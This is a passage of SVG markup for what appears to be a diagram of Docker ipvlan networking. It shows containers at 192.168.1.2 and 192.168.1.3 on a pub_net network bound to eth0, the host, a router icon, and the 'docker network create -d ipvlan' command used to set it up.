font-weight="normal" text-decoration="" line-height="14px" x="33" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="80" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="87" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="90" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="97" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="100" y="26">24</text></g></g><g transform="translate(0,0) matrix(1,0,0,1,168,162.818751317853)"><g><g transform="translate(0,0) scale(0.62,0.3176182707993458)"><g><path fill="url(#rNGNyECMdeKI)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(1.6129032258064517,3.148433487416555)"><path fill="none" stroke="none" d="M 0 0 L 62 0 Q 62 0 62 0 L 62 31.76182707993458 Q 62 31.76182707993458 62 31.76182707993458 L 0 31.76182707993458 Q 0 31.76182707993458 0 31.76182707993458 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#rNGNyECMdeKI)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 62 0 Q 62 0 62 0 L 62 31.76182707993458 Q 62 31.76182707993458 62 31.76182707993458 L 0 31.76182707993458 Q 0 31.76182707993458 0 31.76182707993458 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,175.4593795664339,158.31875131785318)"><g transform="translate(0,0)"><g transform="translate(-177.92,-162.39526029012058) translate(2.4606204335660777,4.076508972267391) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 179.9593795664339 162.81875131785318 L 179.9593795664339 194.58057839778746" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,213.54062043356592,158.3187513178527)"><g transform="translate(0,0)"><g transform="translate(-219.46,-164.08922440105042) translate(5.919379566434088,5.7704730831977145) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 218.04062043356592 162.8187513178527 L 218.04062043356592 194.58057839778775" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,194.5,158.318751317853)"><g transform="translate(0,0)"><g transform="translate(-197.14,-164.08922440105042) translate(2.6399999999999864,5.770473083197402) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 199 162.818751317853 L 199 194.5805783977876" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,126,195)"><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="30" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="45" y="12">container2</text></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="33" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="80" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="87" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="90" y="26">3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="97" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="100" y="26">24</text></g></g><g transform="matrix(1,0,0,1,104,130)"><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="0" width="79" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="34" y="12">pub_net</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="78" y="12"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="85" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="109" y="12">)</text></g></g><g transform="matrix(1,0,0,1,95,100)"><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g/></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,16,114)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="4" y="12">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="12">Host</text></g></g><g transform="matrix(1,0,0,1,81.616,49.859996948242184)"><g transform="translate(0,0)"><g transform="translate(-85,-50) translate(3.3840000000000003,0.1400030517578159) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 88.116 56.359996948242184 L 160.558 56.359996948242184 Q 170.558 56.359996948242184 170.558 66.35999694824218 L 170.558 102 Q 170.558 112 169.779 112 L 169 112" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,73,236)"><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="193" height="56" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="174" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="12">network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="85" y="12">create</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="118" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="125" y="12">d</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="135" y="12">ipvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="167" y="12"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="152" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="26">--</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">subnet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="64" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="84" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="88" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="108" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="111" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="118" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="121" y="26">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="128" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="131" y="26">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="144" y="26"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="144" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="40">--</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="40">gateway</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="40">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="40">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="96" y="40">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="116" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="120" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="126" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="130" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="136" y="40"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="139" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="54">-</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="17" y="54">o</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="54">parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="54">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="54">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="95" y="54">pub_net</text></g></g><g transform="matrix(1,0,0,1,89,24)"><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="81" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="20" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="23" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="43" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="47" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="67" y="26">24</text></g></g><g transform="matrix(1,0,0,1,58.49998401988711,49.575)"><g transform="translate(0,0)"><g transform="translate(-147,-50) translate(88.50001598011289,0.42499999999999716) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 64.99998401988711 56.075 L 241 56.075" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,241,36)"><g><g transform="translate(0,0) scale(0.6083333333333336,0.6104050109462419)"><g><g><path fill="#3966A0" stroke="rgb(0,0,0)" d="M 102.635 0 C 93.815 0 86.371 6.797 85.395 15.43 L 4.554 15.43 C 2.043 15.431 0 17.473 0 19.984 L 0 53.338 C 0 55.849 2.043 57.892 4.554 57.892 L 8.016 57.892 L 8.016 65.776 L 96.471 65.776 L 96.471 57.892 L 99.672 57.892 C 102.184 57.892 104.227 55.849 104.227 53.338 L 104.227 34.655 C 107.211 34.382 109.971 33.334 112.331 31.735 L 112.331 31.735 C 112.785 31.428 113.223 31.1 113.643 30.753 C 113.655 30.744 113.665 30.734 113.676 30.725 C 114.093 30.38 114.492 30.017 114.875 29.635 C 114.875 29.635 114.887 29.623 114.893 29.617 C 118.039 26.471 120 22.143 120 17.365 C 120 7.79 112.21 0 102.635 0 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 102.688 3.191 C 94.836 3.191 88.45 9.579 88.45 17.43 C 88.45 25.281 94.838 31.669 102.688 31.669 C 110.54 31.669 116.926 25.281 116.926 17.43 C 116.926 9.579 110.539 3.191 102.688 3.191 Z M 97.377 20.901 C 97.118 20.901 96.859 20.802 96.662 20.605 C 96.267 20.21 96.267 19.569 96.662 19.174 L 97.412 18.424 L 91.228 18.424 C 90.669 18.424 90.216 17.971 90.216 17.412 C 90.216 16.853 90.67 16.4 91.229 16.4 L 97.414 16.4 L 96.699 15.686 C 96.303 15.291 96.303 14.65 96.699 14.255 C 97.095 13.86 97.735 13.86 98.13 14.255 L 100.571 16.696 C 100.665 16.79 100.739 16.902 100.791 17.026 C 100.894 17.273 100.894 17.552 100.791 17.799 C 100.739 17.924 100.665 18.036 100.571 18.129 L 98.093 20.605 C 97.895 20.802 97.637 20.901 97.377 20.901 Z M 105.863 25.522 L 103.422 27.963 C 103.225 28.161 102.965 28.259 102.707 28.259 C 102.698 28.259 102.689 28.254 102.68 28.254 C 102.671 28.254 102.663 28.259 102.655 28.259 C 102.305 28.259 102.012 28.07 101.83 27.801 L 99.515 25.484 C 99.119 25.089 99.119 24.448 99.515 24.053 C 99.91 23.658 100.55 23.658 100.945 24.053 L 101.644 24.752 L 101.644 9.174 L 100.945 9.873 C 100.748 10.071 100.488 10.169 100.23 10.169 C 99.97 10.169 99.711 10.07 99.515 9.873 C 99.119 9.478 99.119 8.837 99.515 8.442 L 101.954 6 C 102.35 5.605 102.988 5.605 103.385 6 L 105.864 8.478 C 106.26 8.873 106.26 9.514 105.864 9.909 C 105.667 10.107 105.408 10.205 105.149 10.205 C 104.889 10.205 104.63 10.106 104.434 9.909 L 103.667 9.143 L 103.667 24.857 L 104.434 24.091 C 104.829 23.696 105.468 23.696 105.864 24.091 C 106.258 24.486 106.258 25.126 105.863 25.522 Z M 114.148 18.46 L 107.964 18.46 L 108.677 19.174 C 109.073 19.569 109.073 20.21 108.677 20.605 C 108.48 20.803 108.22 20.901 107.961 20.901 C 107.702 20.901 107.442 20.802 107.246 20.605 L 104.808 18.165 C 104.713 18.072 104.64 17.959 104.587 17.835 C 104.485 17.588 104.485 17.309 104.587 17.062 C 104.64 16.937 104.713 16.825 104.808 16.732 L 107.284 14.255 C 107.68 13.86 108.32 13.86 108.715 14.255 C 109.11 14.65 109.11 15.291 108.715 15.686 L 107.964 16.437 L 114.149 16.437 C 114.708 16.437 115.161 16.89 115.161 17.449 C 115.16 18.008 114.707 18.46 114.148 18.46 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 80.533 36.476 A 3.247 3.247 0 1 0 80.53299837650013 36.47924699945883 Z" opacity="0.5" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 35.006 L 20.39 35.006 L 20.39 24 L 9.278 24 L 9.278 35.006 Z M 10.929 25.567 L 18.819 25.567 L 18.819 31.173 L 16.536 31.173 L 16.536 33.456 L 13.213 33.456 L 13.213 31.173 L 10.93 31.173 L 10.929 25.567 L 10.929 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 35.015 L 35.365 35.015 L 35.365 24.009 L 24.253 24.009 L 24.253 35.015 Z M 25.904 25.576 L 33.794 25.576 L 33.794 31.182 L 31.51 31.182 L 31.51 33.465 L 28.187 33.465 L 28.187 31.182 L 25.904 31.182 L 25.904 25.576 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 50.3 24.009 L 39.188 24.009 L 39.188 35.014 L 50.3 35.014 L 50.3 24.009 Z M 48.729 31.173 L 46.446 31.173 L 46.446 33.456 L 43.123 33.456 L 43.123 31.173 L 40.84 31.173 L 40.84 25.567 L 48.73 25.567 L 48.729 31.173 L 48.729 31.173 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 35.023 L 65.234 35.023 L 65.234 24.018 L 54.123 24.018 L 54.123 35.023 Z M 55.774 25.567 L 63.664 25.567 L 63.664 31.173 L 61.38 31.173 L 61.38 33.456 L 58.057 33.456 L 58.057 31.173 L 55.774 31.173 L 55.774 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 49.95 L 20.39 49.95 L 20.39 38.944 L 9.278 38.944 L 9.278 49.95 Z M 10.929 40.502 L 18.819 40.502 L 18.819 46.108 L 16.536 46.108 L 16.536 48.391 L 13.213 48.391 L 13.213 46.108 L 10.93 46.108 L 10.929 40.502 L 10.929 40.502 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 49.958 L 35.365 49.958 L 35.365 38.953 L 24.253 38.953 L 24.253 49.958 Z M 25.904 40.52 L 33.794 40.52 L 33.794 46.126 L 31.51 46.126 L 31.51 48.408 L 28.187 48.408 L 28.187 46.126 L 25.904 46.126 L 25.904 40.52 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 39.228 49.966 L 50.34 49.966 L 50.34 38.962 L 39.228 38.962 L 39.228 49.966 Z M 40.839 40.511 L 48.729 40.511 L 48.729 46.117 L 46.446 46.117 L 46.446 48.4 L 43.123 48.4 L 43.123 46.117 L 40.84 46.117 L 40.839 40.511 L 40.839 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 49.966 L 65.234 49.966 L 65.234 38.962 L 54.123 38.962 L 54.123 49.966 Z M 55.774 40.511 L 63.664 40.511 L 63.664 46.117 L 61.38 46.117 L 61.38 48.4 L 58.057 48.4 L 58.057 46.117 L 55.774 46.117 L 55.774 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 11.504 57.898 L 92.919 57.898 Q 92.919 57.898 92.919 57.898 L 92.919 62.69 Q 92.919 62.69 92.919 62.69 L 11.504 62.69 Q 11.504 62.69 11.504 62.69 L 11.504 57.898 Q 11.504 57.898 11.504 57.898 Z" opacity="0.7" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 85.525 18.936 L 5.082 18.936 C 4.255 18.936 3.582 19.609 3.582 20.436 L 3.582 53.397 C 3.582 54.224 4.255 54.897 5.082 54.897 L 11.504 54.897 L 92.919 54.897 L 99.082 54.897 C 99.909 54.897 100.582 54.224 100.582 53.397 L 100.582 34.526 C 92.561 33.543 86.232 27.039 85.525 18.936 Z M 20.389 49.95 L 9.278 49.95 L 9.278 38.944 L 20.39 38.944 L 20.389 49.95 L 20.389 49.95 Z M 20.389 35.006 L 9.278 35.006 L 9.278 24 L 20.39 24 L 20.389 35.006 L 20.389 35.006 Z M 35.365 49.958 L 24.253 49.958 L 24.253 38.953 L 35.365 38.953 L 35.365 49.958 Z M 35.365 35.015 L 24.253 35.015 L 24.253 24.009 L 35.365 24.009 L 35.365 35.015 Z M 39.188 24.009 L 50.3 24.009 L 50.3 35.014 L 39.188 35.014 L 39.188 24.009 Z M 50.34 49.966 L 39.228 49.966 L 39.228 38.962 L 50.34 38.962 L 50.34 49.966 Z M 65.234 49.966 L 54.123 49.966 L 54.123 38.962 L 65.234 38.962 L 65.234 49.966 Z M 65.234 35.023 L 54.123 35.023 L 54.123 24.018 L 65.234 24.018 L 65.234 35.023 Z M 77.286 39.723 C 75.493 39.723 74.039 38.269 74.039 36.476 C 74.039 34.683 75.493 33.229 77.286 33.229 C 79.079 33.229 80.533 34.683 80.533 36.476 C 80.533 38.269 79.08 39.723 77.286 39.723 Z M 89.541 39.723 C 87.748 39.723 86.294 38.269 86.294 36.476 C 86.294 34.683 87.748 33.229 89.541 33.229 C 91.334 33.229 92.788 34.683 92.788 36.476 C 92.787 38.269 91.334 39.723 89.541 39.723 Z" opacity="0.93" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,222,79)"><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="14" fill-opacity="0"/></g></g><g transform="translate(20,28) 